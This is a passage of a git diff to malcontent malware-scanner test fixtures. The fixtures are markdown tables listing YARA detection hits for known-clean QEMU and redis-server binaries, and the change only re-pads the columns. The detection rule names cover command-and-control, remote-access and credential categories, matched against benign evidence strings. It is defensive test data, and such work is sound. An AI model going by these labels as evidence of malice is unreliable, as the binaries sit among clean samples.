[plugin_vcpu_syscall](https://github.com/search?q=plugin_vcpu_syscall&type=code)
[qemu_plugin_add_dyn](https://github.com/search?q=qemu_plugin_add_dyn&type=code)
[qemu_plugin_install](https://github.com/search?q=qemu_plugin_install&type=code)
[qemu_plugin_opts](https://github.com/search?q=qemu_plugin_opts&type=code)
[qemu_plugin_outs](https://github.com/search?q=qemu_plugin_outs&type=code)
[qemu_plugin_path_to](https://github.com/search?q=qemu_plugin_path_to&type=code)
[qemu_plugin_request](https://github.com/search?q=qemu_plugin_request&type=code)
[qemu_plugin_reset](https://github.com/search?q=qemu_plugin_reset&type=code)
[qemu_plugin_u64_add](https://github.com/search?q=qemu_plugin_u64_add&type=code)
[qemu_plugin_u64_get](https://github.com/search?q=qemu_plugin_u64_get&type=code)
[qemu_plugin_u64_set](https://github.com/search?q=qemu_plugin_u64_set&type=code)
[qemu_plugin_u64_sum](https://github.com/search?q=qemu_plugin_u64_sum&type=code)
[qemu_plugin_version](https://github.com/search?q=qemu_plugin_version&type=code)
[tcg_gen_plugin_cb](https://github.com/search?q=tcg_gen_plugin_cb&type=code)
[tcg_gen_plugin_mem_cb](https://github.com/search?q=tcg_gen_plugin_mem_cb&type=code)
[tlb_plugin_lookup](https://github.com/search?q=tlb_plugin_lookup&type=code) | +| LOW | [exec/program/background](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program-background.yara#waitpid) | [wait for process to exit](https://linux.die.net/man/2/waitpid) | [waitpid](https://github.com/search?q=waitpid&type=code) | +| LOW | [fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir) | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [mkdir](https://github.com/search?q=mkdir&type=code) | +| LOW | [fs/directory/remove](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-remove.yara#rmdir) | Uses libc functions to remove directories | [rmdir](https://github.com/search?q=rmdir&type=code) | +| LOW | [fs/file/delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete.yara#unlink) | [deletes files](https://man7.org/linux/man-pages/man2/unlink.2.html) | [unlinkat](https://github.com/search?q=unlinkat&type=code) | +| LOW | [fs/file/truncate](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-truncate.yara#ftruncate) | truncate a file to a specified length | [ftruncate64](https://github.com/search?q=ftruncate64&type=code) | +| LOW | [fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlinkat](https://github.com/search?q=readlinkat&type=code) | +| LOW | [fs/mount](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/mount.yara#mount) | mounts file systems | [-o](https://github.com/search?q=-o&type=code)
[mount](https://github.com/search?q=mount&type=code) | +| LOW | [fs/node_create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/node-create.yara#mknod) | [create device files](https://man7.org/linux/man-pages/man2/mknod.2.html) | [mknod](https://github.com/search?q=mknod&type=code) | +| LOW | [fs/path/etc](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/etc.yara#etc_path) | path reference within /etc | [/etc/qemu-ifdown](https://github.com/search?q=%2Fetc%2Fqemu-ifdown&type=code)
[/etc/qemu-ifup](https://github.com/search?q=%2Fetc%2Fqemu-ifup&type=code)
[/etc/qemu/qemu.conf](https://github.com/search?q=%2Fetc%2Fqemu%2Fqemu.conf&type=code) | +| LOW | [fs/path/var](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/var.yara#var_path) | path reference within /var | [/var/tmp](https://github.com/search?q=%2Fvar%2Ftmp&type=code) | +| LOW | [fs/permission/chown](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission/permission-chown.yara#fchownat) | May change file ownership | [fchownat](https://github.com/search?q=fchownat&type=code) | +| LOW | [fs/symlink_resolve](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/symlink-resolve.yara#realpath) | [resolves symbolic links](https://man7.org/linux/man-pages/man3/realpath.3.html) | [realpath](https://github.com/search?q=realpath&type=code) | +| LOW | [fs/watch](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/watch.yara#inotify) | monitors filesystem events | [inotify](https://github.com/search?q=inotify&type=code) | +| LOW | [net/dns/txt](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-txt.yara#dns_txt) | Uses DNS TXT (text) records | [TXT](https://github.com/search?q=TXT&type=code)
[dns](https://github.com/search?q=dns&type=code) | +| LOW | [net/http/request](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http-request.yara#http_request) | makes HTTP requests | [HTTP/1.](https://github.com/search?q=HTTP%2F1.&type=code) | +| LOW | [net/ip/multicast_send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-multicast-send.yara#multicast) | [send data to multiple nodes simultaneously](https://en.wikipedia.org/wiki/IP_multicast) | [multicast](https://github.com/search?q=multicast&type=code) | +| LOW | [net/ip/send_unicast](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-send-unicast.yara#unicast) | send data to the internet | [unicast](https://github.com/search?q=unicast&type=code) | +| LOW | [net/resolve/hostname](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/resolve/hostname-resolve.yara#gethostbyname) | [resolve network host name to IP address](https://linux.die.net/man/3/gethostbyname) | [gethostbyname](https://github.com/search?q=gethostbyname&type=code) | +| LOW | [net/resolve/hostport_parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/resolve/hostport-parse.yara#getaddrinfo) | Network address and service translation | [freeaddrinfo](https://github.com/search?q=freeaddrinfo&type=code)
[getaddrinfo](https://github.com/search?q=getaddrinfo&type=code) | +| LOW | [net/socket/local_addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-local_addr.yara#getsockname) | [get local address of connected socket](https://man7.org/linux/man-pages/man2/getsockname.2.html) | [getsockname](https://github.com/search?q=getsockname&type=code) | +| LOW | [net/socket/peer_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-peer-address.yara#getpeername) | [get peer address of connected socket](https://man7.org/linux/man-pages/man2/getpeername.2.html) | [getpeername](https://github.com/search?q=getpeername&type=code) | +| LOW | [net/socket/receive](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-receive.yara#recvmsg) | [receive a message from a socket](https://linux.die.net/man/2/recvmsg) | [recvmsg](https://github.com/search?q=recvmsg&type=code) | +| LOW | [net/socket/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-send.yara#sendmsg) | [send a message to a socket](https://linux.die.net/man/2/sendmsg) | [sendmsg](https://github.com/search?q=sendmsg&type=code)
[sendto](https://github.com/search?q=sendto&type=code) | +| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://qemu.org/contribute/report-a-bug](https://qemu.org/contribute/report-a-bug)
[https://wiki.qemu.org/Documentation/9psetup](https://wiki.qemu.org/Documentation/9psetup) | +| LOW | [os/fd/epoll](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/epoll.yara#epoll) | [I/O event notification facility](https://linux.die.net/man/7/epoll) | [epoll_wait](https://github.com/search?q=epoll_wait&type=code) | +| LOW | [os/kernel/seccomp](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/kernel/seccomp.yara#seccomp) | [operate on Secure Computing state of the process](https://man7.org/linux/man-pages/man2/seccomp.2.html) | [seccomp](https://github.com/search?q=seccomp&type=code) | +| LOW | [process/chroot](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/chroot.yara#chroot) | change the location of root for the process | [chroot](https://github.com/search?q=chroot&type=code) | +| LOW | [process/groupid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groupid-set.yara#setgid) | set real and effective group ID of process | [setgid](https://github.com/search?q=setgid&type=code) | +| LOW | [process/groups_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groups-set.yara#setgroups) | set group access list | [setgroups](https://github.com/search?q=setgroups&type=code) | +| LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) | +| LOW | [process/unshare](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/unshare.yara#syscall_unshare) | disassociate parts of the process execution context | [unshare](https://github.com/search?q=unshare&type=code) | +| LOW | [process/userid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/userid-set.yara#setuid) | [set real and effective user ID of current process](https://man7.org/linux/man-pages/man2/setuid.2.html) | [setuid](https://github.com/search?q=setuid&type=code) | diff --git a/tests/linux/clean/redis-server.aarch64.md b/tests/linux/clean/redis-server.aarch64.md index 300e3d50b..c5917e34a 100644 --- a/tests/linux/clean/redis-server.aarch64.md +++ b/tests/linux/clean/redis-server.aarch64.md @@ -1,51 +1,52 @@ ## linux/clean/redis-server.aarch64 [🟡 MEDIUM] -| RISK | KEY | DESCRIPTION | EVIDENCE | -|--------|----------------------------------------------------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[bus_port](https://github.com/search?q=bus_port&type=code)
[host_port](https://github.com/search?q=host_port&type=code)
[master_port](https://github.com/search?q=master_port&type=code)
[prev_ip](https://github.com/search?q=prev_ip&type=code)
[tcp_port](https://github.com/search?q=tcp_port&type=code)
[updatePort](https://github.com/search?q=updatePort&type=code) | -| MEDIUM | [discover/user/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/username-get.yara#whoami) | [returns the user name running this process](https://man7.org/linux/man-pages/man1/whoami.1.html) | [whoami](https://github.com/search?q=whoami&type=code) | -| MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [execCommandAbort](https://github.com/search?q=execCommandAbort&type=code)
[replicaStartCommandStream](https://github.com/search?q=replicaStartCommandStream&type=code) | -| MEDIUM | [exec/dylib/symbol_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/symbol-address.yara#dlsym) | [get the address of a symbol](https://man7.org/linux/man-pages/man3/dlsym.3.html) | [dlsym](https://github.com/search?q=dlsym&type=code) | -| MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execve) | executes external programs | [execve](https://github.com/search?q=execve&type=code) | -| MEDIUM | [exec/shell/echo](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/echo.yara#elf_calls_shell_echo) | [program generates text with echo command](https://linux.die.net/man/1/echo) | [echo 'maxmemory 128mb'](https://github.com/search?q=echo+%27maxmemory+128mb%27&type=code)
[echo madvise > /sys/kernel/mm/transparent_hugepage/enabled' as root](https://github.com/search?q=echo+madvise+%3E+%2Fsys%2Fkernel%2Fmm%2Ftransparent_hugepage%2Fenabled%27+as+root&type=code)
[echo never > /sys/kernel/mm/transparent_hugepage/enabled'](https://github.com/search?q=echo+never+%3E+%2Fsys%2Fkernel%2Fmm%2Ftransparent_hugepage%2Fenabled%27&type=code)
[echo tsc > /sys/devices/system/clocksource/clocksource0/current_clock](https://github.com/search?q=echo+tsc+%3E+%2Fsys%2Fdevices%2Fsystem%2Fclocksource%2Fclocksource0%2Fcurrent_clock&type=code) | -| MEDIUM | [fs/file/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-create.yara#CreateFile) | create a new file | [CreateFileEvent](https://github.com/search?q=CreateFileEvent&type=code) | -| MEDIUM | [fs/file/delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete.yara#DeleteFile) | delete a file | [DeleteFileEvent](https://github.com/search?q=DeleteFileEvent&type=code) | -| MEDIUM | [fs/file/times_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-times-set.yara#shell_toucher) | change file timestamps | [touch the specified keys](https://github.com/search?q=touch+the+specified+keys&type=code) | -| MEDIUM | [fs/path/relative](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/relative.yara#relative_path_val) | references and possibly executes relative path | [./redis-check-aof](https://github.com/search?q=.%2Fredis-check-aof&type=code)
[./redis-server](https://github.com/search?q=.%2Fredis-server&type=code) | -| MEDIUM | [fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path) | path reference within /tmp | [/tmp/dump.bin](https://github.com/search?q=%2Ftmp%2Fdump.bin&type=code)
[/tmp/dump.hex](https://github.com/search?q=%2Ftmp%2Fdump.hex&type=code) | -| MEDIUM | [fs/permission/modify](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission/permission-modify.yara#chmod) | [modifies file permissions](https://linux.die.net/man/1/chmod) | [chmod](https://github.com/search?q=chmod&type=code) | -| MEDIUM | [fs/proc/arbitrary_pid](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/arbitrary-pid.yara#proc_arbitrary) | access /proc for arbitrary pids | [/proc/%ld/smaps](https://github.com/search?q=%2Fproc%2F%25ld%2Fsmaps&type=code) | -| MEDIUM | [impact/remote_access/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/heartbeat.yara#heartbeat) | references a 'heartbeat' | [RM_SendChildHeartbeat](https://github.com/search?q=RM_SendChildHeartbeat&type=code)
[RedisModule_SendChildHeartbeat](https://github.com/search?q=RedisModule_SendChildHeartbeat&type=code) | -| MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits content to websites | [POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | -| MEDIUM | [net/ip/addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/addr.yara#ip_addr) | mentions an 'IP address' | [IP address](https://github.com/search?q=IP+address&type=code) | -| MEDIUM | [net/ip/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-parse.yara#inet_pton) | parses IP address (IPv4 or IPv6) | [inet_pton](https://github.com/search?q=inet_pton&type=code) | -| MEDIUM | [net/ip/string](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-string.yara#inet_ntoa) | [converts IP address from byte to string](https://linux.die.net/man/3/inet_ntoa) | [inet_ntop](https://github.com/search?q=inet_ntop&type=code) | -| MEDIUM | [net/socket/listen](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-listen.yara#listen) | generic listen string | [accept](https://github.com/search?q=accept&type=code)
[listen](https://github.com/search?q=listen&type=code)
[socket](https://github.com/search?q=socket&type=code) | -| MEDIUM | [net/socket/reuseport](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/reuseport.yara#reuseport) | reuse TCP/IP ports for listening and connecting | [SO_REUSEADDR](https://github.com/search?q=SO_REUSEADDR&type=code) | -| MEDIUM | [persist/daemon](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/daemon/daemon.yara#daemon) | Run as a background daemon | [daemonize](https://github.com/search?q=daemonize&type=code) | -| MEDIUM | [persist/pid_file](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/pid_file.yara#pid_file) | pid file, likely DIY daemon | [/var/run/redis.pid](https://github.com/search?q=%2Fvar%2Frun%2Fredis.pid&type=code)
[createPidFile](https://github.com/search?q=createPidFile&type=code) | -| MEDIUM | [process/name_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-set.yara#__progname) | [get or set the current process name](https://stackoverflow.com/questions/273691/using-progname-instead-of-argv0) | [__progname](https://github.com/search?q=__progname&type=code) | -| MEDIUM | [sus/exclamation](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/exclamation.yara#exclamations) | gets very excited | [Check your memory ASAP !!!](https://github.com/search?q=Check+your+memory+ASAP+%21%21%21&type=code)
[Sentinel was not able to save the new configuration on disk!!!](https://github.com/search?q=Sentinel+was+not+able+to+save+the+new+configuration+on+disk%21%21%21&type=code) | -| LOW | [credential/password](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/password/password.yara#password) | references a 'password' | [ACLCheckPasswordHash](https://github.com/search?q=ACLCheckPasswordHash&type=code)
[ACLHashPassword](https://github.com/search?q=ACLHashPassword&type=code)
[authentication password for the default](https://github.com/search?q=authentication+password+for+the+default&type=code)
[bit user password](https://github.com/search?q=bit+user+password&type=code)
[checkPasswordBasedAuth](https://github.com/search?q=checkPasswordBasedAuth&type=code)
[for the output password](https://github.com/search?q=for+the+output+password&type=code)
[passwords](https://github.com/search?q=passwords&type=code)
[the number of password](https://github.com/search?q=the+number+of+password&type=code)
[tlsPasswordCallback](https://github.com/search?q=tlsPasswordCallback&type=code)
[username and password](https://github.com/search?q=username+and+password&type=code)
[username-password pair or user is](https://github.com/search?q=username-password+pair+or+user+is&type=code) | -| LOW | [data/random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/random/insecure.yara#bsd_rand) | [generate random numbers insecurely](https://man.openbsd.org/rand) | [srand](https://github.com/search?q=srand&type=code) | -| LOW | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [uname](https://github.com/search?q=uname&type=code) | -| LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | -| LOW | [exec/dylib/address_check](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/address-check.yara#dladdr) | [determine if address belongs to a shared library](https://man7.org/linux/man-pages/man3/dladdr.3.html) | [dladdr](https://github.com/search?q=dladdr&type=code) | -| LOW | [exec/program/background](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program-background.yara#waitpid) | [wait for process to exit](https://linux.die.net/man/2/waitpid) | [waitpid](https://github.com/search?q=waitpid&type=code) | -| LOW | [fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir) | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [mkdir](https://github.com/search?q=mkdir&type=code) | -| LOW | [fs/directory/remove](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-remove.yara#rmdir) | Uses libc functions to remove directories | [rmdir](https://github.com/search?q=rmdir&type=code) | -| LOW | [fs/file/truncate](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-truncate.yara#ftruncate) | truncate a file to a specified length | [ftruncate64](https://github.com/search?q=ftruncate64&type=code) | -| LOW | [fs/file/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-write.yara#file_write) | writes to file | [ewriteConfigOverwriteFile](https://github.com/search?q=ewriteConfigOverwriteFile&type=code) | -| LOW | [fs/lock_update](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/lock-update.yara#flock) | apply or remove an advisory lock on a file | [flock](https://github.com/search?q=flock&type=code) | -| LOW | [fs/path/etc](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/etc.yara#etc_path) | path reference within /etc | [/etc/myredis.conf](https://github.com/search?q=%2Fetc%2Fmyredis.conf&type=code)
[/etc/rc.local](https://github.com/search?q=%2Fetc%2Frc.local&type=code)
[/etc/redis/](https://github.com/search?q=%2Fetc%2Fredis%2F&type=code)
[/etc/sentinel.conf](https://github.com/search?q=%2Fetc%2Fsentinel.conf&type=code)
[/etc/sysctl.conf](https://github.com/search?q=%2Fetc%2Fsysctl.conf&type=code) | -| LOW | [fs/path/var](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/var.yara#var_path) | path reference within /var | [/var/run/redis.pid](https://github.com/search?q=%2Fvar%2Frun%2Fredis.pid&type=code) | -| LOW | [fs/tempdir/tempfile_create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/tempfile-create.yara#mktemp) | Uses mktemp to create temporary files | [temp file](https://github.com/search?q=temp+file&type=code) | -| LOW | [net/resolve/hostport_parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/resolve/hostport-parse.yara#getaddrinfo) | Network address and service translation | [freeaddrinfo](https://github.com/search?q=freeaddrinfo&type=code)
[getaddrinfo](https://github.com/search?q=getaddrinfo&type=code) | -| LOW | [net/socket/local_addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-local_addr.yara#getsockname) | [get local address of connected socket](https://man7.org/linux/man-pages/man2/getsockname.2.html) | [getsockname](https://github.com/search?q=getsockname&type=code) | -| LOW | [net/socket/peer_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-peer-address.yara#getpeername) | [get peer address of connected socket](https://man7.org/linux/man-pages/man2/getpeername.2.html) | [getpeername](https://github.com/search?q=getpeername&type=code) | -| LOW | [net/socket/receive](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-receive.yara#recv) | [receive a message to a socket](https://linux.die.net/man/2/recv) | [recv](https://github.com/search?q=recv&type=code)
[socket](https://github.com/search?q=socket&type=code) | -| LOW | [net/socket/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-send.yara#send) | [send a message to a socket](https://linux.die.net/man/2/send) | [send](https://github.com/search?q=send&type=code)
[socket](https://github.com/search?q=socket&type=code) | -| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://redis.io/commands/slowlog](https://redis.io/commands/slowlog)
[https://redis.io/topics/latency-monitor.](https://redis.io/topics/latency-monitor.) | -| LOW | [os/fd/epoll](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/epoll.yara#epoll) | [I/O event notification facility](https://linux.die.net/man/7/epoll) | [epoll_create](https://github.com/search?q=epoll_create&type=code)
[epoll_wait](https://github.com/search?q=epoll_wait&type=code) | -| LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) | +| RISK | KEY | DESCRIPTION | EVIDENCE | +|--------|---------------------------------------------------------------------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| +| MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[bus_port](https://github.com/search?q=bus_port&type=code)
[host_port](https://github.com/search?q=host_port&type=code)
[master_port](https://github.com/search?q=master_port&type=code)
[prev_ip](https://github.com/search?q=prev_ip&type=code)
[tcp_port](https://github.com/search?q=tcp_port&type=code)
[updatePort](https://github.com/search?q=updatePort&type=code) | +| MEDIUM | [discover/user/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/username-get.yara#whoami) | [returns the user name running this process](https://man7.org/linux/man-pages/man1/whoami.1.html) | [whoami](https://github.com/search?q=whoami&type=code) | +| MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [execCommandAbort](https://github.com/search?q=execCommandAbort&type=code)
[replicaStartCommandStream](https://github.com/search?q=replicaStartCommandStream&type=code) | +| MEDIUM | [exec/dylib/symbol_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/symbol-address.yara#dlsym) | [get the address of a symbol](https://man7.org/linux/man-pages/man3/dlsym.3.html) | [dlsym](https://github.com/search?q=dlsym&type=code) | +| MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execve) | executes external programs | [execve](https://github.com/search?q=execve&type=code) | +| MEDIUM | [exec/shell/echo](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/echo.yara#elf_calls_shell_echo) | [program generates text with echo command](https://linux.die.net/man/1/echo) | [echo 'maxmemory 128mb'](https://github.com/search?q=echo+%27maxmemory+128mb%27&type=code)
[echo madvise > /sys/kernel/mm/transparent_hugepage/enabled' as root](https://github.com/search?q=echo+madvise+%3E+%2Fsys%2Fkernel%2Fmm%2Ftransparent_hugepage%2Fenabled%27+as+root&type=code)
[echo never > /sys/kernel/mm/transparent_hugepage/enabled'](https://github.com/search?q=echo+never+%3E+%2Fsys%2Fkernel%2Fmm%2Ftransparent_hugepage%2Fenabled%27&type=code)
[echo tsc > /sys/devices/system/clocksource/clocksource0/current_clock](https://github.com/search?q=echo+tsc+%3E+%2Fsys%2Fdevices%2Fsystem%2Fclocksource%2Fclocksource0%2Fcurrent_clock&type=code) | +| MEDIUM | [fs/file/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-create.yara#CreateFile) | create a new file | [CreateFileEvent](https://github.com/search?q=CreateFileEvent&type=code) | +| MEDIUM | [fs/file/delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete.yara#DeleteFile) | delete a file | [DeleteFileEvent](https://github.com/search?q=DeleteFileEvent&type=code) | +| MEDIUM | [fs/file/times_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-times-set.yara#shell_toucher) | change file timestamps | [touch the specified keys](https://github.com/search?q=touch+the+specified+keys&type=code) | +| MEDIUM | [fs/path/relative](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/relative.yara#relative_path_val) | references and possibly executes relative path | [./redis-check-aof](https://github.com/search?q=.%2Fredis-check-aof&type=code)
[./redis-server](https://github.com/search?q=.%2Fredis-server&type=code) | +| MEDIUM | [fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path) | path reference within /tmp | [/tmp/dump.bin](https://github.com/search?q=%2Ftmp%2Fdump.bin&type=code)
[/tmp/dump.hex](https://github.com/search?q=%2Ftmp%2Fdump.hex&type=code) | +| MEDIUM | [fs/permission/modify](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission/permission-modify.yara#chmod) | [modifies file permissions](https://linux.die.net/man/1/chmod) | [chmod](https://github.com/search?q=chmod&type=code) | +| MEDIUM | [fs/proc/arbitrary_pid](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/arbitrary-pid.yara#proc_arbitrary) | access /proc for arbitrary pids | [/proc/%ld/smaps](https://github.com/search?q=%2Fproc%2F%25ld%2Fsmaps&type=code) | +| MEDIUM | [impact/remote_access/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/heartbeat.yara#heartbeat) | references a 'heartbeat' | [RM_SendChildHeartbeat](https://github.com/search?q=RM_SendChildHeartbeat&type=code)
[RedisModule_SendChildHeartbeat](https://github.com/search?q=RedisModule_SendChildHeartbeat&type=code) | +| MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits content to websites | [POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | +| MEDIUM | [net/ip/addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/addr.yara#ip_addr) | mentions an 'IP address' | [IP address](https://github.com/search?q=IP+address&type=code) | +| MEDIUM | [net/ip/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-parse.yara#inet_pton) | parses IP address (IPv4 or IPv6) | [inet_pton](https://github.com/search?q=inet_pton&type=code) | +| MEDIUM | [net/ip/string](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-string.yara#inet_ntoa) | [converts IP address from byte to string](https://linux.die.net/man/3/inet_ntoa) | [inet_ntop](https://github.com/search?q=inet_ntop&type=code) | +| MEDIUM | [net/socket/listen](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-listen.yara#listen) | generic listen string | [accept](https://github.com/search?q=accept&type=code)
[listen](https://github.com/search?q=listen&type=code)
[socket](https://github.com/search?q=socket&type=code) | +| MEDIUM | [net/socket/reuseport](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/reuseport.yara#reuseport) | reuse TCP/IP ports for listening and connecting | [SO_REUSEADDR](https://github.com/search?q=SO_REUSEADDR&type=code) | +| MEDIUM | [persist/daemon](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/daemon/daemon.yara#daemon) | Run as a background daemon | [daemonize](https://github.com/search?q=daemonize&type=code) | +| MEDIUM | [persist/pid_file](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/pid_file.yara#pid_file) | pid file, likely DIY daemon | [/var/run/redis.pid](https://github.com/search?q=%2Fvar%2Frun%2Fredis.pid&type=code)
